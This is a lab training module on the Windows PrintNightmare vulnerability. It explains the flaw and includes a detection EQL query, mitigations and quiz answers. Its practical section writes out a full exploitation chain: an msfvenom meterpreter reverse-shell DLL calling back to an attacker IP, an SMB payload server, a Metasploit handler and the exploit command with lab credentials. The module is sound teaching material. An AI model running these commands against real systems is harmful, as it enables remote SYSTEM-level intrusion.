Print Nightmare

Exercise CVE-2021-34527 PrintNightmare

1. Introduction

PrintNightmare is a remote code execution and local privilege escalation vulnerability affecting the Windows Print Spooler service in Windows systems.

In this module, you will learn how to exploit the PrintNightmare vulnerability.

  • CVSS Base Score: 8.8

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

1.1 How was It Discovered?

On June 29, 2021, information about a remotely exploitable vulnerability in the Microsoft Windows Print Spooler service was made public. The vulnerability was originally discovered by security researchers at Sangfor Technologies and responsibly disclosed to Microsoft, as it affects all Windows versions.

1.2 What's up With the Double CVE Designation?

The patch, released on June 8, 2021, originally seemed to have addressed this vulnerability but not the fundamental problem that initially allowed this vulnerability to exist. This resulted in a new exploitation technique that bypassed the patch, leading to a brand new CVE — CVE-2021-34527. This vulnerability is similar, but distinct from the vulnerability that is assigned CVE-2021-1675.

1.3 Is There a Public Exploit Code Available?

There are multiple versions of functional exploit code available on the internet. Implementations have also been added to popular attack tools like Mimikatz and Metasploit.

1.4 So What Is the Actual Vulnerability?

The Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx Windows API call (the underpinning of the Point and Print capability), resulting in the ability to execute code with SYSTEM privileges. The access restriction issue in RpcAddPrinterDriverEx was addressed by a patch. However, security researches discovered an alternative function, RpcAsyncAddPrinterDriver, which is now used in newer exploit versions to bypass the patch entirely and achieve remote code execution as well as local privilege escalation. Ultimately, this vulnerability allows attackers to load a malicious DLL in a Windows host under SYSTEM privileges.

2. Practical Example

In the following steps, you will be using the Impacket framework and a published PrintNightmare proof-of-concept made by cube0x0, which is based on the C# version (SharpPrintNightmare) originally created by Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370).

The Python PoC is already downloaded for you and available at /root/Desktop/workspace, but there are some prerequisites you will need to set up first.

2.1 Prepare the exploit

Install Impacket

pip install /root/desktop/workspace/impacket-master

2.2 Compile and serve payload

As the vulnerability allows the attacker to load arbitrary dynamic link libraries (DLLs) that contain executable code, your next steps are to compile a DLL payload and serve it from your Kali host using SMB.

Using msfvenom, create a meterpreter reverse shell payload that will later be served via the SMB server. Note that the payload is set to windows/x64/meterpreter/reverse_tcp, which automatically sets the architecture to x64.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.201 LPORT=4444 -f dll -o /root/Desktop/workspace/smb/shell.dll

Now that the payload has been created, you can use Impacket's smbserver.py script to start an SMB server in order to serve the payload. Open a new terminal window and run the following command:

smbserver.py share /root/Desktop/workspace/smb -smb2support

2.3 Exploit the vulnerability

Before running the exploitation script, it is necessary to start a payload handler via Metasploit.

Start Metasploit by running the msfconsole command in a terminal, and select the multi/handler module:

msf6 > use multi/handler

Now that the multi/handler module has been selected, the windows/x64/meterpreter/reverse_tcp payload must be selected to match the DLL compiled previously:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp

Furthermore, the localhost (LHOST) and local port (LPORT) must be configured before running the listener:

msf6 exploit(multi/handler) > set LHOST eth0

msf6 exploit(multi/handler) > set LPORT 4444 # Must match the payload options set in previous step

Run the listener by issuing the run command, which should start a reverse TCP handler.

Now that the listener is active and the SMB server is ready to serve the payload, the exploitation script CVE-2021-1675.py located in /root/Desktop/workspace is ready to be executed.

Target Windows Server: 192.168.0.4 Target user: bob password: Student123

Attacker host:192.168.6.201

Executing Exploit:

python3 CVE-2021-1675.py bob:Student123@192.168.0.4'\\192.168.6.201\share\shell.dll'

Let's go back to our listener. A meterpreter session is successfully established:

shell

Let's grab the flag:

3. Detection

As Microsoft's latest patch may not be a suitable option of mitigation for many organizations, from a SOCs perspective, the ability to detect malicious activity relating to PrintNightmare is crucial. But are your systems properly configured to do so? First, you should ensure that logging is enabled from both of the following sources:

  • WinEventLog:Microsoft-Windows-PrintService/Admin

  • WinEventLog:Microsoft-Windows-PrintService/Operational

So now that the logging is enabled, what exactly should you be looking out for? Well, there are a few potentially malicious log artifacts you should be aware of. The following table lists some of the known ones.

Fortunately, due to the attack surface of this particular vulnerability, the industry has responded quickly regarding detection, mitigation, and remediation. Many SIEM vendors have already created alerts or rules to identify the activity mentioned above. The following is an example from Splunk to detect spoolsv.exe writing a DLL to the \spool\drivers\x64\ directory:

Elastic has also been quick to react with some of their own alerts for PrintNightmare activity. The following is an EQL query to detect registry modifications to the Data or Config FIles of spoolsv.exe:

  (registry.path : "HKLM\\SYSTEM\\ControlSet*\\Control\\Print\\Environments\\Windows*\\Drivers\\Version-3\\mimikatz*\\Data File" or
  (registry.path : "HKLM\\SYSTEM\\ControlSet*\\Control\\Print\\Environments\\Windows*\\Drivers\\Version-3\\*\\Configuration File" and
   registry.data.strings : ("kernelbase.dll", "ntdll.dll", "kernel32.dll", "winhttp.dll", "user32.dll")))

4. Mitigation

Microsoft has released updated versions of their patches and guidance as of July 13th. That said, if Microsoft's instructions are not carefully followed, hosts may still be left exposed to exploitation. The following information has been grabbed from Microsoft's security update guide.

  • Install the official updates from Microsoft

  • Follow additional guidance from Microsoft regarding registry settings and/or * GPO updates:

    • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint (set to 0)

    • NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)

    • UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Two workarounds can be implemented if updates cannot be installed:

Option 1 — Disable the Print Spooler service

If disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:

Stop-Service -Name Spooler -Force Set-Service -Name Spooler -StartupType Disabled

Workaround impact: This will disable the ability to print both locally and remotely.

Option 2 — Disable inbound remote printing through Group Policy

You can also configure the settings via Group Policy as follows:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

You must restart the Print Spooler service for the group policy to take effect.

Workaround impact: This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.

5. Security Questions

  1. Which log channel must be enabled manually in order to obtain sufficient logs to detect potentially malicious activity related to the PrintNightmare vulnerability?

  2. Upon exploitation of the PrintNightmare vulnerability, attackers can execute code from an arbitrary .dll with which account privileges?

  3. A potential IoC of the PrintNightmare vulnerability is unusual .dll creations to which directory?

  4. Patching your systems with the latest Windows KB (KB5005010) will successfully remediate this vulnerability without any repercussions?

  5. One option for mitigation is to disable the Print Spooler service. What is the potential impact of this workaround?

6. Answers

  1. Microsoft-Windows-PrintService/Operational

  2. SYSTEM

  3. \spool\drivers\x64\

  4. False. KB5005010 only restricts the installation of print drivers to administrators, which may not be suitable for many organizations.

  5. Inability to print both locally and remotely

PreviousRedis ServerNextBaron Samedit

Last updated